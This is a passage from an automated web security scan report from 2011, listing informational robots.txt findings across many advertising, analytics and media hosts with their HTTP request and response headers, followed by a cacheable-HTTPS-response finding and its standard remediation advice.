Date: Sun, 04 Sep 2011 00:55:03 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

23.25. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:49 GMT
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1384e1-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

23.26. http://imp.fetchback.com/serve/fb/adtag.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

23.27. http://jlinks.industrybrains.com/jsct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jlinks.industrybrains.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 00:47:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/plain
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 04 Sep 2011 00:47:50 GMT
Content-Length: 26

User-agent: *
Disallow: /

23.28. http://l.addthiscdn.com/live/t00/250lo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.addthiscdn.com
Path:	/live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 00:52:50 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

23.29. http://m.xp1.ru4.com/activity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.xp1.ru4.com
Path:	/activity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: m.xp1.ru4.com

Response

23.30. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s87897360916249 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.sprint.com
Path:	/b/ss/sprintuniversalsiteprod/1/H.22.1/s87897360916249

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:40 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "3212e-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www387
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

23.31. http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nmsacramento.112.2o7.net
Path:	/b/ss/nmsacramento/1/H.20.3/s83257504000794

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nmsacramento.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:04:37 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "dc05e-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www496
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

23.32. http://pixel.mathtag.com/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x6809 26633
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

23.33. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 01:00:45 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 04 Sep 2011 01:00:45 GMT
Server: QS

User-agent: *
Disallow: /

23.34. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://premium.mookie1.com
Path:	/2/nbc.com/ac@Bottom3

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: premium.mookie1.com

Response

23.35. http://r.casalemedia.com/rum previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.casalemedia.com
Path:	/rum

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 01 Sep 2010 20:16:17 GMT
ETag: "1ad83a9-1a-5eb98640"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Sun, 04 Sep 2011 00:56:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:56:39 GMT
Connection: close

User-agent: *
Disallow: /

23.36. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

23.37. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rt.legolas-media.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:52:19 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 17:46:27 GMT
ETag: "38100-1b-4a79269af42c0"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

23.38. http://s0.2mdn.net/2179194/HYSA_BLACK_RATE_300x250_40k.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/2179194/HYSA_BLACK_RATE_300x250_40k.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 00:44:46 GMT
Expires: Mon, 05 Sep 2011 00:44:46 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 440

User-agent: *
Disallow: /

23.39. http://s6.scribdassets.com/aggregated/css/base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s6.scribdassets.com
Path:	/aggregated/css/base.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s6.scribdassets.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:12 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n43 ( lax-agg-n52), ht-d lax-agg-n52.panthercdn.com
Cache-Control: max-age=604800
Expires: Thu, 08 Sep 2011 21:36:38 GMT
Age: 184774
Content-Length: 575
Content-Type: text/plain; charset=utf-8
Last-Modified: Thu, 01 Sep 2011 20:28:45 GMT
Connection: close

User-agent: *
Disallow: /search/
Disallow: /notifications/
Disallow: /analytics/
Disallow: /docinfo/
Disallow: /word/add_to_favorites/
Disallow: /word/comment_login/
Disallow: /word/document_url/
Disa
...[SNIP]...

23.40. http://s7.scribdassets.com/aggregated/css/web.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s7.scribdassets.com
Path:	/aggregated/css/web.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s7.scribdassets.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:13 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n45 ( lax-agg-n52), ht lax-agg-n52.panthercdn.com
Cache-Control: max-age=604800
Expires: Thu, 08 Sep 2011 21:36:38 GMT
Age: 184775
Content-Length: 575
Content-Type: text/plain; charset=utf-8
Last-Modified: Thu, 01 Sep 2011 20:28:45 GMT
Connection: close

User-agent: *
Disallow: /search/
Disallow: /notifications/
Disallow: /analytics/
Disallow: /docinfo/
Disallow: /word/add_to_favorites/
Disallow: /word/comment_login/
Disallow: /word/document_url/
Disa
...[SNIP]...

23.41. http://sales.reuters.com/pitches/roughcuts/rc728x90.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.reuters.com
Path:	/pitches/roughcuts/rc728x90.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sales.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:41:04 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 20 May 2009 20:42:11 GMT
ETag: "176c40e-a0-46a5e0fc6cec0"
Accept-Ranges: bytes
Content-Length: 160
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /holidaycard/
Disallow: /marketing/
Disallow: /pitches/
Disallow: /index.html
Disallow: /invitation/
Disallow: /mediaguide/blog/

23.42. http://static.lingospot.com/js/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.lingospot.com
Path:	/js/all.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.lingospot.com

Response

23.43. http://sync.mathtag.com/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sync.mathtag.com

Response

23.44. http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/js/741/mcclatchy/728x90/sacramento_sacbee

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Last-Modified: Wed, 31 Aug 2011 21:42:54 GMT
ETag: "c280006-1a-4abd402b9f380"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:55:05 GMT
Connection: close

User-agent: *
Disallow: /

23.45. http://tcr.tynt.com/javascripts/Tracer.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tcr.tynt.com
Path:	/javascripts/Tracer.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:04:40 GMT
ETag: "3516526417"
Expires: Sun, 04 Sep 2011 01:34:39 GMT
Last-Modified: Wed, 11 Nov 2009 19:14:11 GMT
Server: EOS (lax001/54D9)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 271
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
User-Agent: *
Disallow: /T
...[SNIP]...

23.46. http://trc.taboolasyndication.com/reuters/trc/2/json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trc.taboolasyndication.com
Path:	/reuters/trc/2/json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: trc.taboolasyndication.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 01:01:05 GMT
Content-Type: text/plain
Content-Length: 65
Last-Modified: Thu, 25 Aug 2011 16:28:27 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Disallow: /

User-agent: Adsbot-Google
Disallow: /

23.47. http://turn.nexac.com/r/pu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://turn.nexac.com
Path:	/r/pu

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: turn.nexac.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 00:57:25 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

23.48. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s84327528064604 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usatoday1.112.2o7.net
Path:	/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s84327528064604

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:37 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "d9159-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www87
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

23.49. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s81099810544401 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wa.proflowers.com
Path:	/b/ss/proflodevelopment/1/H.22.1/s81099810544401

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wa.proflowers.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:07:03 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "36a0e5-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www419
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

23.50. http://www.bizographics.com/collect/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizographics.com
Path:	/collect/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizographics.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:48:11 GMT
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

23.51. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.62.148.41
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

23.52. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Sun, 04 Sep 2011 00:59:09 GMT
Expires: Sun, 04 Sep 2011 00:59:09 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

23.53. http://www.googleadservices.com/pagead/conversion/1031221371/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1031221371/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 00:51:10 GMT
Expires: Sun, 04 Sep 2011 00:51:10 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

23.54. http://www.linkedin.com/analytics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.linkedin.com
Path:	/analytics/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1162225322"
Last-Modified: Wed, 06 Apr 2011 03:23:47 GMT
Content-Length: 24473
Connection: keep-alive
Date: Sun, 04 Sep 2011 00:47:42 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...

23.55. https://www.linkedin.com/secure/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.linkedin.com
Path:	/secure/login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-872004964"
Last-Modified: Wed, 06 Apr 2011 03:23:52 GMT
Content-Length: 24473
Connection: keep-alive
Date: Sun, 04 Sep 2011 01:19:15 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...

23.56. http://www.meebo.com/cim/sandbox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.meebo.com
Path:	/cim/sandbox.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:10:22 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 99
Last-Modified: Tue, 09 Aug 2011 21:34:11 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /httpstest.html
Disallow: /httpsokay.html
Disallow: /mcmd/
Disallow: /cmd/

23.57. http://www.personalcreations.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.personalcreations.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/plain
Expires: Sun, 04 Sep 2011 09:20:54 GMT
Last-Modified: Thu, 04 Aug 2011 15:42:07 GMT
Accept-Ranges: bytes
ETag: "1CC52BD10BCB180"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:02:36 GMT
Connection: close
Content-Length: 3584

User-agent: *
Disallow: http://www.personalcreations.com/unique-gifts-babies-PBABBSL
Disallow: http://www.personalcreations.com/new-baby-gifts-PBABBSL
Disallow: http://www.personalcreations.com/per
...[SNIP]...

23.58. http://www.publish2.com/newsgroups/state-worker.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.publish2.com
Path:	/newsgroups/state-worker.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.publish2.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:10 GMT
Server: Apache
Last-Modified: Tue, 30 Aug 2011 11:52:17 GMT
ETag: "7c2c8-33-a4acde40"
Accept-Ranges: bytes
Content-Length: 51
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cache/
Disallow: /static/

23.59. http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/article/2011/09/04/us-weather-football-idUSTRE78222D20110904

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:48 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:47:17 GMT
Content-Length: 213
Age: 30
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain;charset=UTF-8

User-agent: *
Disallow: /finance/stocks/option
Disallow: /finance/stocks/financialHighlights
Disallow: /search
Disallow: /beta
SITEMAP: http://www.reuters.com/sitemap_news_index.xml

User-agent: Pipl

...[SNIP]...

23.60. http://www.sacbee.com/notfound previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/notfound

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sacbee.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 12 Jul 2010 21:19:37 GMT
ETag: "13e0dcb-3bb-4c3b86e9"
Server: Apache/1.3.41
Content-Type: text/plain
Cache-Control: max-age=350
Date: Sun, 04 Sep 2011 00:58:06 GMT
Content-Length: 955
Connection: close

# update log
# 2009-08-26 - kparker @ MI 727-7946968 added, then removed 1198 and newhomes.
# 209-01-29 - pbuckley @ MI added sitemap2 and sitemap3
# 2008-07-23 - pbuckley @ MI
# 2007/03/05 - rwm

Us
...[SNIP]...

23.61. http://www.scribd.com/embeds/63688924/content previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scribd.com
Path:	/embeds/63688924/content

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scribd.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 04 Sep 2011 00:55:48 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 575
Last-Modified: Fri, 02 Sep 2011 20:14:57 GMT
Connection: close
Vary: Accept-Encoding
X-Bot: 1
Accept-Ranges: bytes

User-agent: *
Disallow: /search/
Disallow: /notifications/
Disallow: /analytics/
Disallow: /docinfo/
Disallow: /word/add_to_favorites/
Disallow: /word/comment_login/
Disallow: /word/document_url/
Disa
...[SNIP]...

23.62. http://www.sprint.com/index_c.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sprint.com
Path:	/index_c.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:36 GMT
Server: Apache/2.2.14 (Red Hat)
Last-Modified: Tue, 29 Jun 2010 17:26:58 GMT
ETag: "52042d-7f-48a2e8b5b7c80"
Accept-Ranges: bytes
Content-Length: 127
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /localbusiness/
# Prevent duplicate localbusiness content from being indexed
Disallow: /index_c.html

23.63. https://www.sprint.net/performance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sprint.net

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:33 GMT
Server: Apache/2.2.4 (Unix)
Last-Modified: Tue, 11 Dec 2007 15:43:44 GMT
ETag: "bc18-1d-93e86c00"
Accept-Ranges: bytes
Content-Length: 29
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ip/

23.64. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wisdomtree.com
Path:	/bannerads/dyneld2010fall/dyneld2010falllp.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wisdomtree.com

Response

HTTP/1.1 200 OK
Content-Length: 92
Content-Type: text/plain
Last-Modified: Wed, 16 Jun 2010 19:39:36 GMT
Accept-Ranges: bytes
ETag: "404ea78bdcb1:4c1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:03 GMT
Connection: close

User-agent: *
Disallow: /_Archive/
Disallow: /admin/
Disallow: /css/
Disallow: /scripts/

23.65. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wunderground.com
Path:	/auto/sacbee/CA/Sacramento.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:10:55 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Thu, 03 Mar 2011 23:44:18 GMT
Accept-Ranges: bytes
Content-Length: 27683
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /AS5000/
Disallow: /history/
Disallow: /geo/
Disallow: /ndfdimagery/
Disallow: /weatherstation/
Disallow: /auto/927/weatherstation/
Disallow: /auto/1000tourtemplate/weatherstat
...[SNIP]...

23.66. http://www.youtube.com/embed/xXftjfC3b5o previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/xXftjfC3b5o

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 00:55:45 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 18:22:34 GMT
ETag: "21b-4abe5541eae80"
Accept-Ranges: bytes
Content-Length: 539
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube
# Created in the distant future (the year 2000) after
# the robotic uprising of the mid 90's which wiped out all humans.

User-agent: Mediapartners-Google*
Disallow:

Use
...[SNIP]...

24. Cacheable HTTPS response previous next
There are 5 instances of this issue:

https://socialize.gigya.com/gs/bookmark.aspx
https://sprintlb.ehosts.net/narouter/eQueueCheck.aspx
https://www.sprint.net/performance/
https://www.sprint.net/performance/gen_line_xml.php
https://www.sprint.net/performance/gen_pop_xml.php

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

24.1. https://socialize.gigya.com/gs/bookmark.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://socialize.gigya.com
Path:	/gs/bookmark.aspx

Request

GET /gs/bookmark.aspx HTTP/1.1
Host: socialize.gigya.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-XSS-Protection: 0
X-AspNet-Version: 2.0.50727
X-Server: web517
